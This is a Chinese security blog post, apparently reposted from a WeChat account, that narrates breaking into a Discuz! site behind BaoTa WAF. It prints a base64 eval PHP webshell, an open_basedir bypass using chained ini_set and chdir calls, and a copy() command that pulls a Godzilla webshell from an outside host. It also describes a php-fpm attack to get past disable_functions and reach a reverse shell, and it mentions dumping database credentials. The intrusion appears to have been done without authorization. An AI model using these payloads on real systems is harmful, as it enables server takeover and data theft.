一次利用哥斯拉马绕过宝塔waf

admin 2022年4月25日02:02:02评论357 views字数 1581阅读5分16秒阅读模式


这次渗透的主站是 一个Discuz!3.4 的搭建 违法招piao 网站, 配置有宝

塔WAF

一次利用哥斯拉马绕过宝塔waf


用 Discuz!ML 3.X 的漏洞进行攻击,但是没有成功

一次利用哥斯拉马绕过宝塔waf


发现主站外链会有一个发卡网,引导人们来这充值,是 某某发卡网,而且域名指向也是主站的ip,两个网站在同一个 ,此处忘记截图了


网上有通杀payload,写shell的过程在这里省略了


一次利用哥斯拉马绕过宝塔waf


由于网站存在宝塔WAF ,写入shell 必须变形一下,将命令进行base64编码在传进去


<?php @eval(base64_decode($_POST['yanshu']));?>

一次利用哥斯拉马绕过宝塔waf


在phpinfo()里可以看到,宝塔默认会设置 open_basedir 以及 disable_functions,导致蚁剑的shell直接连接之后不大好用,命令执行不了

绕过 open_basedir 查看文件

利用 ini_set() 来 bypass open_basedir 来获取路径名和目录内容,base64 编码之后执行,发现宝塔目录下还有其他站点目录


eval("mkdir('1');chdir('1');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir('/www/wwwroot'));");


一次利用哥斯拉马绕过宝塔waf





哥斯拉管理webshell


为了方便查看文件 ,使用哥斯拉马,加密器选择PHP_EVAL_XOR_BASE64,用copy命令传到服务器中,这样流量就可以不会被宝塔waf拦截了

copy('http://xxxx/g.php','/www/wwwroot/xxx.com/g.php');


一次利用哥斯拉马绕过宝塔waf

哥斯拉马可以自动实现bypass openbase_dir ,读取数据库 用户名密码,可以更改管理员用户进后台或者脱库

一次利用哥斯拉马绕过宝塔waf

一次利用哥斯拉马绕过宝塔waf


绕过 disable_functions 执行命令


disable_functions 禁用了 putenv()、mail() 、pcntl_exec() 等函数,环境是php5.6,导致很多常规bypass的方法都用不了

一次利用哥斯拉马绕过宝塔waf


网站是使用 nginx+php5.6 ,用攻击 php-fpm的办法来bypass,攻击原理可以看 参考链接


先找到php-fpm的配置 如:/www/server/php/56/etc/php-fpm.conf


一次利用哥斯拉马绕过宝塔waf


或者看nginx的配置 ,得到 php-fpm 的位置 unix:/tmp/php-cgi-56.sock


一次利用哥斯拉马绕过宝塔waf


首先 选择 PAttackFPM 将模块加载并执行


一次利用哥斯拉马绕过宝塔waf

再利用哥斯拉马中 bypass disable_functions 的模块 ,成功执行命令


一次利用哥斯拉马绕过宝塔waf

获取反弹 shell ,可以进一步尝试对主机进行提权了


一次利用哥斯拉马绕过宝塔waf


作者提供的文库链接:https://pan.baidu.com/s/1Le14YbNIIVpNICZ-kdkuVw
提取码:e68y

解压密码 www.ddosi.com


参考文章:

https://xz.aliyun.com/t/9295

https://blog.csdn.net/qq_38154820/article/details/106330106

声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权!否则需自行承担,本公众号及原作者不承担相应的后果.

作者:鼹鼠Yanshu    原文地址:https://xz.aliyun.com/t/10996


注及时推送最新安全威胁资讯!

一次利用哥斯拉马绕过宝塔waf

一次利用哥斯拉马绕过宝塔waf



干货 | CS绕过vultr特征检测修改算法


实战 | 用中国人写的红队服务器搞一次内网穿透练习


实战 | 渗透某培训平台经历





好文分享收藏赞一下最美点在看哦

原文始发于微信公众号(渗透安全团队):一次利用哥斯拉马绕过宝塔waf

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月25日02:02:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一次利用哥斯拉马绕过宝塔wafhttp://cn-sec.com/archives/940085.html

发表评论

匿名网友 填写信息